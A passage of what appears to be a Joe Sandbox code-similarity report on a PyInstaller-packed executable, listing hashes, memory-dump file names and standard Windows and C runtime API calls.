                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                                                                                                                        • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                        • Instruction ID: 2bcd6b351d0624e0401666f7402915abd90b6a792e39c84f9d9618a9eaf664a6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 381191BAE5EA8341FA65112CD5723752050EF7C374F046634EB7EC62F6EE3CA8516111
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C2AF
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C2CE
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C2F6
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C307
                                                                                                                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF6ABA5B4E7,?,?,00000000,00007FF6ABA5B782,?,?,?,?,?,00007FF6ABA5B70E), ref: 00007FF6ABA5C318
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        • Opcode ID: 336e871d9fe7b9feb1d4e8714057d4483739f4a760c37d9f3dc9b8317e64e27b
                                                                                                                                                                                                                                                        • Instruction ID: 545f54e44a9bfc4b2a2b8b50494c6d7997c061add1f0e13f4c0ab678dc4bf46e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 336e871d9fe7b9feb1d4e8714057d4483739f4a760c37d9f3dc9b8317e64e27b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C11AF61F0E24602FAA96779A5912796141DF4C7B0F445334EB3E966FAFE2CBA418304
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Value
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                                                                                                                        • Opcode ID: 4d8455bc275ec880ad9f8951d6e4f70d9feb0184cd7bbcf1a18e1e455a1bd2fd
                                                                                                                                                                                                                                                        • Instruction ID: 7bb94a862ae37a049062e9190862884bba88fc68e805bbe8a8e05b043db4caf0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d8455bc275ec880ad9f8951d6e4f70d9feb0184cd7bbcf1a18e1e455a1bd2fd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD114851B0F20342FAA9667548A12791142DF4C330F480736DB3E9A2F7FD2CBA818744
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Window$Process$ConsoleCurrentShowSleepThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3908687701-0
                                                                                                                                                                                                                                                        • Opcode ID: c4ce1bea477394a5bd7c29aaffed6a601c2f4b1d57d0592e327ceaa9095476a5
                                                                                                                                                                                                                                                        • Instruction ID: 2a59af0512c95ce7c6d6f51384dad9a984dd0561e41fe481c4ec9c9ab51c4286
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4ce1bea477394a5bd7c29aaffed6a601c2f4b1d57d0592e327ceaa9095476a5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82018160F1A74282EB545B26B59403967A0EF4CBC4F045035DB9FC6678FF3DE8518701
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: verbose
                                                                                                                                                                                                                                                        • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                        • Opcode ID: 5742ae6ca51b03e9d6fd204cb41504e479b7e72b202bc53543779a715851f7d3
                                                                                                                                                                                                                                                        • Instruction ID: 554cd09e728609565530c34830cb8828231bf68fd783ae5ca85606858d160ec4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5742ae6ca51b03e9d6fd204cb41504e479b7e72b202bc53543779a715851f7d3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9191EF32A0AA4681E7218E25D95077D3291FB08B94F844336DB4D933E6FF3DEA458319
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                        • Opcode ID: 59f559b3b4a43374a67f10f227721a3fbc4a07d852e694dccd2ae9d3b54f0314
                                                                                                                                                                                                                                                        • Instruction ID: 034170eaacb73b5503208b21e4219ccbc4d1f649d6e086fdfb3b29718762e0fb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 59f559b3b4a43374a67f10f227721a3fbc4a07d852e694dccd2ae9d3b54f0314
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E58103B2E0E25285FB748F2D81616783AA0EB09B44F565035CB0ED32B5FF3DE985A741
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                        • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                        • Opcode ID: ab412f78eb90613ff4c98a1fac2d50a5770803065215d444c3ce453a3de23157
                                                                                                                                                                                                                                                        • Instruction ID: e701ae7e73056448c09b1e428f0c349faddb5cce635436bf3c87b2b4bcc5f32b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab412f78eb90613ff4c98a1fac2d50a5770803065215d444c3ce453a3de23157
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB517D32B1B6028AEB548F15E444A793BA1FB48B98F118131DB4E877A9FF7DE8418700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                        • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                        • Opcode ID: 2d0d38728c8b81eb1afee087d1255ca92539906646f1d2432080e5defd871a42
                                                                                                                                                                                                                                                        • Instruction ID: 7e14cb1de2c4d2c3b61e1697ac64c2c2665a0e67eb30eced840101c469ba60e0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d0d38728c8b81eb1afee087d1255ca92539906646f1d2432080e5defd871a42
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C861B332909BC585D7649F15E4403AAB7A0FB88794F044635EB9C43BA9EF7CE590CB04
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                        • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                        • Opcode ID: 881cb4ef47e13874d43f93ad661edca9df8e178c9ea1252ba64912ddd8f944cb
                                                                                                                                                                                                                                                        • Instruction ID: 4d80d14208d084ed4629ab7c29738892fa27871bfcc700d1d627efd5100fc909
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 881cb4ef47e13874d43f93ad661edca9df8e178c9ea1252ba64912ddd8f944cb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87518F32A09282CAEB788F65944436C77A0FB58B85F144135DB8D87BE6DF3CE865C705
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,00007FF6ABA4866F), ref: 00007FF6ABA4226E
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess
                                                                                                                                                                                                                                                        • String ID: %ls$WARNING$[PYI-%d:%ls]
                                                                                                                                                                                                                                                        • API String ID: 2050909247-3372507544
                                                                                                                                                                                                                                                        • Opcode ID: 92da2cbc5b979b0862b6cfd95371d042a7d5931ee882c49d5c626b31f152fc77
                                                                                                                                                                                                                                                        • Instruction ID: 0f0936174f6b6d594f7ef2af3578d3d3c9a9b4434be434ff77ebc15096e26458
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92da2cbc5b979b0862b6cfd95371d042a7d5931ee882c49d5c626b31f152fc77
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C21D462B1AB8251E6209BA5F4552EA7764FF887C4F400136EB8D93A7AEF3CD215C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                                        • Opcode ID: fabcd4fad7fa856dcf2e9951dc7cbf89ababb6e1d40fd4369e0489b0ae7d9f25
                                                                                                                                                                                                                                                        • Instruction ID: 93cfaf73ed36a944483f2887a85fe253cc6ac327d0b572cc79da454294b22f54
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fabcd4fad7fa856dcf2e9951dc7cbf89ababb6e1d40fd4369e0489b0ae7d9f25
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9D10472B09A8189E710CF79D4406EC37B1FB48798B444235CF9E97BA9EE38E526C704
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                        • Opcode ID: 44877219fa58a3c80076740d489941753dcdf7d4d18713102933f3384318ca38
                                                                                                                                                                                                                                                        • Instruction ID: 8b1bb1ae2783f108b2544dabfa7c5e666038497eeb62cea21e7812fac954dcf0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44877219fa58a3c80076740d489941753dcdf7d4d18713102933f3384318ca38
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5413D62A0978242FB249B2DD4213B96660EF98BA4F144235EF5C87AF5FF3CD481C700
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6ABA59F82
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: RtlFreeHeap.NTDLL(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B47A
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6ABA5B464: GetLastError.KERNEL32(?,?,?,00007FF6ABA63F92,?,?,?,00007FF6ABA63FCF,?,?,00000000,00007FF6ABA64495,?,?,?,00007FF6ABA643C7), ref: 00007FF6ABA5B484
                                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6ABA4C165), ref: 00007FF6ABA59FA0
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\main.exe
                                                                                                                                                                                                                                                        • API String ID: 3580290477-1027480231
                                                                                                                                                                                                                                                        • Opcode ID: 2a2f06ea51d58fd39cad35a47b9855af257a0ebd26d3c321afc8fcfaab6f6b1a
                                                                                                                                                                                                                                                        • Instruction ID: 0df473f01b1b802c0adabc9597d9decf5d255899f8d4b031dd303b560e170165
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a2f06ea51d58fd39cad35a47b9855af257a0ebd26d3c321afc8fcfaab6f6b1a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E416E32A0AB5296EB24DF65E4400BD37A4EB48784F444135EB4E87B66FF3DE5858244
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                        • Opcode ID: 57f6403a17afa6857eb93518903eebf05678db2d18f563f749b6ba14b42682ba
                                                                                                                                                                                                                                                        • Instruction ID: 274b87c4c894451c9fa987e645fdc5811081c5823bcf923e943152a353694870
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 57f6403a17afa6857eb93518903eebf05678db2d18f563f749b6ba14b42682ba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0041E362B1AA8181EB208F25E4447A977A1FB88784F814131EF8DC77A8EF7CD511C704
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6ABA41B4A), ref: 00007FF6ABA42070
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
